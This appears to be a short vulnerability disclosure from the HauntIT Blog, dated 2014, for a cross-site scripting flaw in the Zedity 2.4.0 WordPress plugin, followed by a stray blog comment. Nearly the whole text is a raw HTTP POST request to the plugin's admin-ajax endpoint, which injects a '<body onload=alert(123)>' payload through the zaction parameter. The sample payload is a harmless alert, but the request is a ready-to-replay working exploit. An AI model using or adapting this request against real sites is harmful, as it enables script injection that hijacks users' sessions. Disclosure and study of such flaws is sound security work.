# ==============================================================
# Title ...| Zedity XSS
# Version .| zedity.2.4.0
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache
zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data-
origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width%
3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+z
edity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+sty
le%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+
style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Cs
ans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_b
lank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-fa
mily%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspa
n%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
thanks
ReplyDelete